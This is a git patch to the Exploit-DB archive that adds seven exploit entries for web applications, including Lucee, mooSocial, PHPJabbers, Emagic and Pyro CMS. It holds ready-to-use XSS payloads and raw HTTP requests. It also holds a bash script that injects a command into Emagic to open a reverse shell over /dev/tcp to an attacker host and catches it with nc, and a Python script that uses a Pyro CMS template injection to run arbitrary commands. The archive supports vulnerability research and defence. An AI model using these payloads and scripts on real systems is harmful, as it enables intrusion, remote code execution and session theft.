From 69f3ee7722635417f30d40dab5b75bdb983d36be Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Wed, 9 Aug 2023 00:16:24 +0000
Subject: [PATCH] DB: 2023-08-09

8 changes to exploits/shellcodes/ghdb

Lucee 5.4.2.17 - Authenticated Reflected XSS

Adlisting Classified Ads 2.14.0 - WebPage Content Information Disclosure

Emagic Data Center Management Suite v6.0 - OS Command Injection

mooSocial 3.1.8 - Reflected XSS

PHPJabbers Vacation Rental Script 4.0 - CSRF

Social-Commerce 3.1.6 - Reflected XSS

Pyro CMS 3.9 - Server-Side Template Injection (SSTI) (Authenticated)
---
 exploits/multiple/webapps/51668.txt | 39 +++++++++++++++
 exploits/php/webapps/51667.txt      | 49 +++++++++++++++++++
 exploits/php/webapps/51670.txt      | 38 +++++++++++++++
 exploits/php/webapps/51671.txt      | 51 ++++++++++++++++++++
 exploits/php/webapps/51672.txt      | 32 ++++++++++++
 exploits/php/webapps/51673.sh       | 49 +++++++++++++++++++
 exploits/python/webapps/51669.txt   | 75 +++++++++++++++++++++++++++++
 files_exploits.csv                  |  7 +++
 8 files changed, 340 insertions(+)
 create mode 100644 exploits/multiple/webapps/51668.txt
 create mode 100644 exploits/php/webapps/51667.txt
 create mode 100644 exploits/php/webapps/51670.txt
 create mode 100644 exploits/php/webapps/51671.txt
 create mode 100644 exploits/php/webapps/51672.txt
 create mode 100755 exploits/php/webapps/51673.sh
 create mode 100644 exploits/python/webapps/51669.txt

diff --git a/exploits/multiple/webapps/51668.txt b/exploits/multiple/webapps/51668.txt
new file mode 100644
index 000000000..ed649f926
--- /dev/null
+++ b/exploits/multiple/webapps/51668.txt
@@ -0,0 +1,39 @@
+# Exploit Title: Lucee 5.4.2.17 - Authenticated Reflected XSS
+# Google Dork: NA
+# Date: 05/08/2023
+# Exploit Author: Yehia Elghaly
+# Vendor Homepage: https://www.lucee.org/
+# Software Link: https://download.lucee.org/
+# Version: << 5.4.2.17
+# Tested on: Windows 10
+# CVE: N/A
+
+
+Summary: Lucee is a light-weight dynamic CFML scripting language with a solid foundation.Lucee is a high performance, open source, ColdFusion / CFML server engine, written in Java.
+
+Description: The attacker can able to convince a victim to visit a malicious URL, can perform a wide variety of actions, such as stealing the victim's session token or login credentials.
+
+The payload: ?msg=<img src=xss onerror=alert('xssya')>
+http://172.16.110.130:8888/lucee/admin/server.cfm?action=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%29%3E
+
+POST /lucee/admin/web.cfm?action=services.gateway&action2=create HTTP/1.1
+Host: 172.16.110.130:8888
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 278
+Origin: http://172.16.110.130:8888
+Connection: close
+Referer: http://172.16.110.130:8888/lucee/admin/web.cfm?action=services.gateway&action2=create
+Cookie: cfid=ee75e255-5873-461d-a631-0d6db6adb066; cftoken=0; LUCEE_ADMIN_LANG=en; LUCEE_ADMIN_LASTPAGE=overview
+Upgrade-Insecure-Requests: 1
+
+name=AsynchronousEvents&class=&cfcPath=lucee.extension.gateway.AsynchronousEvents&id=a&_id=a&listenerCfcPath=lucee.extension.gateway.AsynchronousEventsListener&startupMode=automatic&custom_component=%3Fmsg%3D%3Cimg+src%3Dxss+onerror%3Dalert%28%27xssya%27%29%3E&mainAction=submit
+
+[Affected Component]
+Debugging-->Template
+Service --> Search
+Services  --> Event Gateway
+Service --> Logging
\ No newline at end of file
diff --git a/exploits/php/webapps/51667.txt b/exploits/php/webapps/51667.txt
new file mode 100644
index 000000000..bb3c800d3
--- /dev/null
+++ b/exploits/php/webapps/51667.txt
@@ -0,0 +1,49 @@
+# Exploit Title: Adlisting Classified Ads 2.14.0 - WebPage Content Information Disclosure
+# Exploit Author: CraCkEr
+# Date: 25/07/2023
+# Vendor: Templatecookie
+# Vendor Homepage: https://templatecookie.com/
+# Software Link: https://templatecookie.com/demo/adlisting-classified-ads-script
+# Version: 2.14.0
+# Tested on: Windows 10 Pro
+# Impact: Sensitive Information Leakage
+# CVE: CVE-2023-4168
+
+
+## Description
+
+Information disclosure issue in the redirect responses, When accessing any page on the website,
+Sensitive data, such as API keys, server keys, and app IDs, is being exposed in the body of these redirects.
+
+
+## Steps to Reproduce:
+
+When you visit any page on the website, like:
+
+https://website/ad-list?category=electronics
+https://website/ad-list-search?page=2
+https://website/ad-list-search?keyword=&lat=&long=&long=&lat=&location=&category=&keyword=
+
+in the body page response there's information leakage for
+
++---------------------+
+google_map_key
+api_key
+auth_domain
+project_id
+storage_bucket
+messaging_sender_id
+app_id
+measurement_id
++---------------------+
+
+
+Note: The same information leaked, such as the API keys, server keys, and app ID, was added to the "Firebase Push Notification Configuration" in the Administration Panel.
+
+Settings of "Firebase Push Notification Configuration" in the Administration Panel, on this Path:
+
+https://website/push-notification (Login as Administrator)
+
+
+
+[-] Done
\ No newline at end of file
diff --git a/exploits/php/webapps/51670.txt b/exploits/php/webapps/51670.txt
new file mode 100644
index 000000000..3ff76f3cf
--- /dev/null
+++ b/exploits/php/webapps/51670.txt
@@ -0,0 +1,38 @@
+# Exploit Title: mooSocial 3.1.8 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 28/07/2023
+# Vendor: mooSocial
+# Vendor Homepage: https://moosocial.com/
+# Software Link: https://travel.moosocial.com/
+# Version: 3.1.8
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+# CVE: CVE-2023-4173
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+
+URL path folder is vulnerable to XSS
+
+https://website/classifieds[XSS]/search?category=1
+
+https://website/classifieds/search[XSS]?category=1
+
+
+XSS Payloads:
+
+ijz3y"><img src=a onerror=alert(1)>y4apk
+
+
+[-] Done
\ No newline at end of file
diff --git a/exploits/php/webapps/51671.txt b/exploits/php/webapps/51671.txt
new file mode 100644
index 000000000..03cc4db52
--- /dev/null
+++ b/exploits/php/webapps/51671.txt
@@ -0,0 +1,51 @@
+# Exploit Title: Social-Commerce 3.1.6 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 28/07/2023
+# Vendor: mooSocial
+# Vendor Homepage: https://moosocial.com/
+# Software Link: https://social-commerce.moosocial.com/
+# Version: 3.1.6
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+# CVE: CVE-2023-4174
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+Path: /search/index
+
+GET parameter 'q' is vulnerable to XSS
+
+https://website/search/index?q=[XSS]
+
+
+URL path folder [1,2] is vulnerable to XSS
+
+https://website/stores[XSS]/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent
+
+https://website/user_info[XSS]/index/friends
+
+https://website/user_info/index[XSS]/friends
+
+https://website/faqs[XSS]/index?content_search=
+
+https://website/faqs/index[XSS]?content_search=
+
+
+
+XSS Payloads:
+
+j8chn"><img src=a onerror=alert(1)>ridxm
+
+
+[-] Done
\ No newline at end of file
diff --git a/exploits/php/webapps/51672.txt b/exploits/php/webapps/51672.txt
new file mode 100644
index 000000000..4ec721031
--- /dev/null
+++ b/exploits/php/webapps/51672.txt
@@ -0,0 +1,32 @@
+# Exploit Title: PHPJabbers Vacation Rental Script 4.0 - CSRF
+# Date: 05/08/2023
+# Exploit Author: Hasan Ali YILDIR
+# Vendor Homepage: https://www.phpjabbers.com/
+# Software Link: https://www.phpjabbers.com/vacation-rental-script/
+# Version: 4.0
+# Tested on: Windows 10 Pro
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+Technical Detail / POC
+
+==========================
+
+1. Login Account
+2. Go to Property Page (https://website/index.php?controller=pjAdminListings&action=pjActionUpdate)
+3. Edit Any Property (https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21)
+
+
+[1] Cross-Site Request Forgery
+
+Request:
+https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21&tab="<script><font%20color="red">CSRF%20test</font>
+
+[2] Cross-Site Scripting (XSS)
+
+Request:
+https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21&tab="<script><image/src/onerror=prompt(8)>
\ No newline at end of file
diff --git a/exploits/php/webapps/51673.sh b/exploits/php/webapps/51673.sh
new file mode 100755
index 000000000..f237c64a6
--- /dev/null
+++ b/exploits/php/webapps/51673.sh
@@ -0,0 +1,49 @@
+#!/bin/bash
+
+# Exploit Title: Emagic Data Center Management Suite v6.0 - OS Command Injection
+# Date: 03-08-2023
+# Exploit Author: Shubham Pandey & thewhiteh4t
+# Vendor Homepage: https://www.esds.co.in/enlight360
+# Version: 6.0.0
+# Tested on: Kali Linux
+# CVE : CVE-2023-37569
+
+URL=$1
+LHOST=$2
+LPORT=$3
+
+echo "*****************************"
+echo "*  ESDS eMagic 6.0.0 RCE    *"
+echo "*  > CVE-2023-37569         *"
+echo "*  > Shubham & thewhiteh4t  *"
+echo "*****************************"
+
+if [ $# -lt 3 ]; then
+    echo """
+USAGE :
+
+./exploit.sh http://<IP> <LHOST> <LPORT>
+./exploit.sh http://192.168.0.10 192.168.0.20 1337
+"""
+    exit 1
+fi
+
+url="$1/index.php/monitor/operations/utilities/"
+
+echo "[+] URL   : $URL"
+echo "[+] LHOST : $LHOST"
+echo "[+] LPORT : $LPORT"
+echo
+
+payload="bash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F$LHOST%2F$LPORT%200%3E%261%27"
+
+post_data="utility=ping&operations=yes&hostname=%3B%20$payload&param_before=&param_after=&probe_id=1&rndval=1682490204846"
+
+echo "[!] Triggering exploit..."
+
+echo $url
+
+(sleep 3; curl -s -X POST -d $post_data $url > /dev/null) &
+
+echo "[+] Catching shell..."
+nc -lvp 4444
\ No newline at end of file
diff --git a/exploits/python/webapps/51669.txt b/exploits/python/webapps/51669.txt
new file mode 100644
index 000000000..5d6c85420
--- /dev/null
+++ b/exploits/python/webapps/51669.txt
@@ -0,0 +1,75 @@
+# Exploit Title: Pyro CMS 3.9 - Server-Side Template Injection (SSTI) (Authenticated)
+# Exploit Author: Daniel Barros (@cupc4k3d) - Hakai Offensive Security
+# Date: 03/08/2023
+# Vendor: https://pyrocms.com/
+# Software Link: https://pyrocms.com/documentation/pyrocms/3.9/getting-started/installation
+# Vulnerable Version(s): 3.9
+# CVE: CVE-2023-29689
+# Notes: You need a user who has access to /admin privilege
+
+# Example Usage:
+# First, run the script: python3 CVE-2023-29689.py
+# Please follow these steps:
+# 1. Enter the application URL: http://localhost:8000
+# 2. Enter the email for authentication: admin@adm.com
+# 3. Enter the password: Admin@@2023
+# 4. Enter the command to be executed: id
+# Result of command execution:
+# uid=1000(cupcake) gid=1000(cupcake) groups=1000(cupcake)
+
+import requests
+from bs4 import BeautifulSoup
+from urllib.parse import urljoin
+
+def login(session, url, email, password):
+    login_url = urljoin(url, '/admin/login')
+    response = session.get(login_url)
+    soup = BeautifulSoup(response.content, 'html.parser')
+    token = soup.find('input', {'name': '_token'})['value']
+
+    payload = {
+        '_token': token,
+        'email': email,
+        'password': password
+    }
+
+    session.post(login_url, data=payload)
+
+# Function to edit role 1 and extract the Description of the Admin user.
+def edit_role_and_extract_description(session, url, command):
+    edit_role_url = urljoin(url, '/admin/users/roles/edit/1')
+    response = session.get(edit_role_url)
+    soup = BeautifulSoup(response.content, 'html.parser')
+    token = soup.find('input', {'name': '_token'})['value']
+
+    payload = {
+        '_token': token,
+        'name_en': 'Admin',
+        'slug': 'admin',
+        'description_en': f'{{{{["{command}"]|map("system")|join}}}}',
+        'action': 'save_exit'
+    }
+
+    session.post(edit_role_url, data=payload)
+
+    # Extract the updated Description from role 1.
+    response = session.get(urljoin(url, '/admin/users/roles'))
+    soup = BeautifulSoup(response.content, 'html.parser')
+    description = soup.find('td', {'data-title': 'Description'}).text.strip()
+
+    return description
+
+def main():
+    url = input("Enter the application URL: ")
+    email = input("Enter the email for authentication: ")
+    password = input("Enter the password : ")
+    command = input("Enter the command to be executed: ")
+
+    with requests.Session() as session:
+        login(session, url, email, password)
+        description = edit_role_and_extract_description(session, url, command)
+        print("\nResult of command execution:")
+        print(description)
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index cb511e66f..e6ec5efa1 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11922,6 +11922,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50413,exploits/multiple/webapps/50413.txt,"Logitech Media Server 8.2.0 - 'Title' Cross-Site Scripting (XSS)",2021-10-13,"Mert Daş",webapps,multiple,,2021-10-13,2021-10-13,0,,,,,,
 46254,exploits/multiple/webapps/46254.txt,"LogonBox Limited / Hypersocket Nervepoint Access Manager - (Unauthenticated) Insecure Direct Object Reference",2019-01-28,0v3rride,webapps,multiple,,2019-01-28,2019-03-16,0,CVE-2019-6716,,,,,
 49918,exploits/multiple/webapps/49918.py,"LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)",2021-06-01,g0ldm45k,webapps,multiple,,2021-06-01,2021-06-01,0,CVE-2018-16167,,,,http://www.exploit-db.comLogonTracer-1.2.0.zip,
+51668,exploits/multiple/webapps/51668.txt,"Lucee 5.4.2.17 - Authenticated Reflected XSS",2023-08-08,"Yehia Elghaly",webapps,multiple,,2023-08-08,2023-08-08,0,,,,,,
 46404,exploits/multiple/webapps/46404.py,"M/Monit 3.7.2 - Privilege Escalation",2019-02-18,"Dolev Farhi",webapps,multiple,,2019-02-18,2019-02-18,0,,,,,http://www.exploit-db.commmonit-3.7.2-linux-x86.tar.gz,
 49081,exploits/multiple/webapps/49081.py,"M/Monit 3.7.4 - Password Disclosure",2020-11-19,"Dolev Farhi",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,,
 49080,exploits/multiple/webapps/49080.py,"M/Monit 3.7.4 - Privilege Escalation",2020-11-19,"Dolev Farhi",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,,
@@ -13465,6 +13466,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47600,exploits/php/webapps/47600.py,"Adive Framework 2.0.7 - Privilege Escalation",2019-11-08,"Pablo Santiago",webapps,php,,2019-11-08,2019-11-08,0,CVE-2019-14347,,,,,
 47966,exploits/php/webapps/47966.txt,"Adive Framework 2.0.8 - Cross-Site Request Forgery (Change Admin Password)",2020-01-28,"Sarthak Saini",webapps,php,,2020-01-28,2020-02-03,1,CVE-2020-7991,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comadive-php7-master.zip,
 47946,exploits/php/webapps/47946.txt,"Adive Framework 2.0.8 - Persistent Cross-Site Scripting",2020-01-20,"Sarthak Saini",webapps,php,,2020-01-20,2020-01-20,0,,,,,,
+51667,exploits/php/webapps/51667.txt,"Adlisting Classified Ads 2.14.0 - WebPage Content Information Disclosure",2023-08-08,CraCkEr,webapps,php,,2023-08-08,2023-08-08,0,CVE-2023-4168,,,,,
 27462,exploits/php/webapps/27462.txt,"AdMan 1.0.20051221 - 'ViewStatement.php' SQL Injection",2003-03-23,r0t,webapps,php,,2003-03-23,2013-08-10,1,CVE-2006-1374;OSVDB-24064,,,,,https://www.securityfocus.com/bid/17208/info
 6702,exploits/php/webapps/6702.txt,"AdMan 1.1.20070907 - 'campaignId' SQL Injection",2008-10-08,SuB-ZeRo,webapps,php,,2008-10-07,2016-12-26,1,OSVDB-48972;CVE-2008-6156,,,,,
 21424,exploits/php/webapps/21424.txt,"ADManager 1.1 - Content Manipulation",2002-04-17,frog,webapps,php,,2002-04-17,2012-09-21,1,OSVDB-86912,,,,,https://www.securityfocus.com/bid/4615/info
@@ -17784,6 +17786,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 36406,exploits/php/webapps/36406.txt,"Elxis CMS 2009 - 'index.php?task' Cross-Site Scripting",2011-12-05,"Ewerson Guimaraes",webapps,php,,2011-12-05,2015-03-16,1,CVE-2011-4918;OSVDB-77563,,,,,https://www.securityfocus.com/bid/50910/info
 15939,exploits/php/webapps/15939.txt,"Elxis CMS 2009.2 - Remote File Inclusion",2011-01-08,n0n0x,webapps,php,,2011-01-08,2011-01-08,0,,,,,http://www.exploit-db.comelxis_2009.2_electra_rev2631.zip,
 15647,exploits/php/webapps/15647.txt,"Elxis CMS 2009.2 - SQL Injection",2010-11-30,"High-Tech Bridge SA",webapps,php,,2010-11-30,2010-12-01,1,,,,,http://www.exploit-db.comelxis_2009.2_electra_rev2631.zip,http://www.htbridge.ch/advisory/sql_injection_in_elxis_cms_1.html
+51673,exploits/php/webapps/51673.sh,"Emagic Data Center Management Suite v6.0 - OS Command Injection",2023-08-08,thewhiteh4t,webapps,php,,2023-08-08,2023-08-08,0,CVE-2023-37569,,,,,
 46076,exploits/php/webapps/46076.txt,"Embed Video Scripts - Persistent Cross-Site Scripting",2019-01-07,"Deyaa Muhammad",webapps,php,80,2019-01-07,2019-01-07,1,,"Cross-Site Scripting (XSS)",,,,
 35724,exploits/php/webapps/35724.txt,"EmbryoCore 1.03 - 'index.php' SQL Injection",2011-05-09,KedAns-Dz,webapps,php,,2011-05-09,2015-01-08,1,,,,,,https://www.securityfocus.com/bid/47763/info
 37509,exploits/php/webapps/37509.txt,"EmbryoCore CMS 1.03 - 'loadcss.php' Multiple Directory Traversal Vulnerabilities",2012-07-16,"Sammy FORGIT",webapps,php,,2012-07-16,2015-07-07,1,,,,,,https://www.securityfocus.com/bid/54470/info
@@ -23578,6 +23581,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51115,exploits/php/webapps/51115.txt,"Moodle LMS 4.0 - Cross-Site Scripting (XSS)",2023-03-28,"Saud Alenazi",webapps,php,,2023-03-28,2023-03-28,0,,,,,,
 4951,exploits/php/webapps/4951.txt,"Mooseguy Blog System 1.0 - 'month' SQL Injection",2008-01-21,The_HuliGun,webapps,php,,2008-01-20,2016-11-14,1,OSVDB-40959;CVE-2008-0424,,,,http://www.exploit-db.commgbs_1.0.zip,
 27871,exploits/php/webapps/27871.txt,"mooSocial 1.3 - Multiple Vulnerabilities",2013-08-26,Esac,webapps,php,,2013-08-26,2013-08-26,0,OSVDB-96633;OSVDB-96632;OSVDB-96631;OSVDB-96630;OSVDB-96629;OSVDB-96628;OSVDB-96627;OSVDB-96626;OSVDB-96625;OSVDB-96624,,,,,
+51670,exploits/php/webapps/51670.txt,"mooSocial 3.1.8 - Reflected XSS",2023-08-08,CraCkEr,webapps,php,,2023-08-08,2023-08-08,1,CVE-2023-4173,,,,,
 45330,exploits/php/webapps/45330.txt,"mooSocial Store Plugin 2.6 - SQL Injection",2018-09-04,"Andrea Bocchetti",webapps,php,,2018-09-04,2018-09-06,0,,"SQL Injection (SQLi)",,,,
 9121,exploits/php/webapps/9121.php,"Morcego CMS 1.7.6 - Blind SQL Injection",2009-07-10,darkjoker,webapps,php,,2009-07-09,,1,OSVDB-55796;CVE-2009-3713,,,,,
 2394,exploits/php/webapps/2394.php,"more.groupware 0.74 - 'new_calendarid' SQL Injection",2006-09-19,x128,webapps,php,,2006-09-18,2016-09-09,1,OSVDB-29017;CVE-2006-4906,,,,http://www.exploit-db.commoregroupware-core-0.7.4.tar.gz,
@@ -27011,6 +27015,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51652,exploits/php/webapps/51652.txt,"PHPJabbers Taxi Booking 2.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4116,,,,,
 30953,exploits/php/webapps/30953.txt,"PHPJabbers Vacation Packages Listing 2.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,webapps,php,80,2014-01-15,2014-01-15,0,OSVDB-102178;OSVDB-102177;OSVDB-102176,,,,,
 30955,exploits/php/webapps/30955.txt,"PHPJabbers Vacation Rental Script 3.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,webapps,php,80,2014-01-15,2014-01-15,0,OSVDB-102225;OSVDB-102224;OSVDB-102220,,,,,
+51672,exploits/php/webapps/51672.txt,"PHPJabbers Vacation Rental Script 4.0 - CSRF",2023-08-08,"Hasan Ali YILDIR",webapps,php,,2023-08-08,2023-08-08,0,,,,,,
 2775,exploits/php/webapps/2775.txt,"Phpjobscheduler 3.0 - 'installed_config_file' File Inclusion",2006-11-13,Firewall,webapps,php,,2006-11-12,,1,OSVDB-30367;CVE-2006-5928;OSVDB-30366;OSVDB-30365;OSVDB-30364,,,,,
 27004,exploits/php/webapps/27004.txt,"PHPJournaler 1.0 - 'Readold' SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",webapps,php,,2006-01-01,2013-07-22,1,CVE-2006-0066;OSVDB-22149,,,,,https://www.securityfocus.com/bid/16111/info
 35990,exploits/php/webapps/35990.txt,"PHPJunkYard GBook 1.6/1.7 - Multiple Cross-Site Scripting Vulnerabilities",2011-07-27,"High-Tech Bridge SA",webapps,php,,2011-07-27,2015-02-04,1,,,,,,https://www.securityfocus.com/bid/48905/info
@@ -29837,6 +29842,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 23382,exploits/php/webapps/23382.txt,"Social Sites MyBB Plugin 0.2.2 - Cross-Site Scripting",2012-12-14,s3m00t,webapps,php,,2012-12-14,2012-12-14,1,OSVDB-88458,,,,http://www.exploit-db.comsocialsites.zip,
 33658,exploits/php/webapps/33658.txt,"Social Web CMS 2 - 'index.php' Cross-Site Scripting",2010-02-19,GoLdeN-z3r0,webapps,php,,2010-02-19,2014-06-07,1,,,,,,https://www.securityfocus.com/bid/38329/info
 10583,exploits/php/webapps/10583.txt,"social Web CMS Beta 2 - Multiple Vulnerabilities",2009-12-21,cp77fk4r,webapps,php,,2009-12-20,,1,OSVDB-61239;OSVDB-61238,,,,http://www.exploit-db.com1_SocialWebCMS_B2_RC1.zip,
+51671,exploits/php/webapps/51671.txt,"Social-Commerce 3.1.6 - Reflected XSS",2023-08-08,CraCkEr,webapps,php,,2023-08-08,2023-08-08,1,CVE-2023-4174,,,,,
 51116,exploits/php/webapps/51116.txt,"Social-Share-Buttons v2.2.3 - SQL Injection",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,,
 34256,exploits/php/webapps/34256.py,"SocialABC NetworX 1.0.3 - Arbitrary File Upload / Cross-Site Scripting",2010-07-05,"John Leitch",webapps,php,,2010-07-05,2014-08-04,1,,,,,,https://www.securityfocus.com/bid/41396/info
 18487,exploits/php/webapps/18487.html,"SocialCMS 1.0.2 - Cross-Site Request Forgery",2012-02-16,"Ivano Binetti",webapps,php,,2012-02-16,2012-02-16,0,OSVDB-71930;CVE-2012-1416,,,,http://www.exploit-db.comsocialcms1.0.2.zip,
@@ -34655,6 +34661,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49930,exploits/python/webapps/49930.txt,"Products.PluggableAuthService 2.6.0 - Open Redirect",2021-06-02,"Piyush Patil",webapps,python,,2021-06-02,2021-06-02,0,CVE-2021-21337,,,,http://www.exploit-db.comProducts.PluggableAuthService-2.6.0.zip,
 51532,exploits/python/webapps/51532.py,"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)",2023-06-14,"Gabriel Lima",webapps,python,,2023-06-20,2023-06-20,1,CVE-2023-0297,,,,,
 39199,exploits/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross-Site Request Forgery",2014-05-23,"Henri Salo",webapps,python,,2014-05-23,2016-01-08,1,CVE-2014-3854;OSVDB-107099,,,,,https://www.securityfocus.com/bid/67610/info
+51669,exploits/python/webapps/51669.txt,"Pyro CMS 3.9 - Server-Side Template Injection (SSTI) (Authenticated)",2023-08-08,"Daniel Barros",webapps,python,,2023-08-08,2023-08-08,0,CVE-2023-29689,,,,,
 51226,exploits/python/webapps/51226.txt,"Roxy WI v6.1.0.0 - Improper Authentication Control",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-05-24,1,CVE-2022-31125,,,,,
 51227,exploits/python/webapps/51227.txt,"Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-06-04,1,CVE-2022-31126,,,,,
 51228,exploits/python/webapps/51228.txt,"Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-04-03,0,CVE-2022-31161,,,,,